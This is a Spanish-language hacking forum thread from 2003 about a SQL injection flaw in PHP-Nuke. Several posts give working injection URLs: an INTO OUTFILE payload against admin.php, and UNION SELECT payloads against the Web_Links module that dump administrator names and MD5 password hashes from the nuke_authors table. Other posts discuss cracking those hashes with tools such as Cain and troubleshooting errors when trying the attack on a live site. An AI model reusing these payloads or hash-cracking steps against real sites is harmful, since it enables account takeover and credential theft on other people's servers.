exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....

Iniciado por el-brujo, 10 Octubre 2003, 16:32 PM

0 Miembros y 2 Visitantes están viendo este tema.

Kriptosys

MD5 no se puede descifrar..... pero como dice Blade se puede crackear.
que no es mas que una Comparacion de Caracteres, es decir Toma un Caracter lo cifra y lo compara con el del Texto cifrado... y asi hasta que de con los caracteres correctos.

FiH nº 3 En camino!!!
CitarF I H - http://www.fihezine.tsx.to 15/11/03 Libertad de expresión, Libertad de Conocimiento

elvizo

bueno y q aplicacion se encarga de hacer dicah operacion? john lo hace? no se si oi algo o me estoy confundiendo
dsH-Team

na8us

Aca solo hemos visto la manera de explotar el bug me gustaria saber cual es la manera de solucionar el problema  :-\

Salu2
En los momentos de crisis, sólo la imaginación es más importante que el conocimiento.
Albert Einstein

elvizo

dsH-Team

JaNi

Citar/admin.php?op=login&pwd=123&aid=Admin'%20INTO%20OUTFILE%20'/path_to_file/pwd.txt<=- Esto es para Unicamente el spaiz-nuke...
Que despues se visualiza en: /path_to_file/pwd.txt...

Eso no funciona en la mayoría de servidores :P
como hacer para sacar el password en md5 de otra forma?

[Ky3zZ]

Realmente funciona
Para el PHP-Nuke y el Modulo WebLinks:

Para que muestre todos los administradores:
/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20

Y para que muestre los Password Codificados de los administradores:
/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20pwd,%20aid%20FROM%20nuke_authors%20

Pero tengo una duda como puedo crackear con el Cain el PWL? es que no lo entiendo.. por mas que traduzco manuales del cain al español no se como crackear el pasword si alguien sabe algo... que me mande un e-mail: juan_lux@hotmail.com
El "terrorismo" es una "espiniya" en la "sociedad" que hay que "eliminarla" lo antes posible, para podamos "vivir" en "PAZ"

[Ky3zZ]

Weinas...oyes yo me preguntaba por casualidad... habria forma de saltarse la proteccion esa?
Es que no me acorde de guardar el Pass en MD5 y ahora an puesto la proteccion en la web donde lo hice y no se... amos que yo me preguntaba eso que si habia alguna manera de poder saber de nuevo el pass saltandose la proteccion..? ??? ??? ???
El "terrorismo" es una "espiniya" en la "sociedad" que hay que "eliminarla" lo antes posible, para podamos "vivir" en "PAZ"

CamelSmoke

En realidad el Password MD5 no se saca de ninguna de esas maneras...bah, tal vez con el spaniz nuke, pero PHP-Nuke no muestra los pass MD5, al menos aun no encontre la forma de verlo ni cifrado ni nada, lo cual me gustaria ya que quiero asegurar mi sitio en PHP-Nuke.
CamelSmoke® - bibliobar.com.ar

p47ch

Disculpar mi ignorancia, pero como se que versión de nuke esta utilizando dicha pagina?

Pues algunas no  lo dicen !

Gracias ! :P



Ademas me sale lo sig:

Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 238

Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 286


y


Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 286

Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 286


Cuando pongo

http://www.el-dominio.com/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20

Por q ?

[Ky3zZ]

Eso es muy facil, te salen los errores de la base de datos.. porque? pues por que la web donde as realizado el bug no tiene activado el modulo de Web_Links o simplemente a borrado ese modulo como preteccion.
Lo que sacamos encuenta.. que no se puede hacer en esa web.
El "terrorismo" es una "espiniya" en la "sociedad" que hay que "eliminarla" lo antes posible, para podamos "vivir" en "PAZ"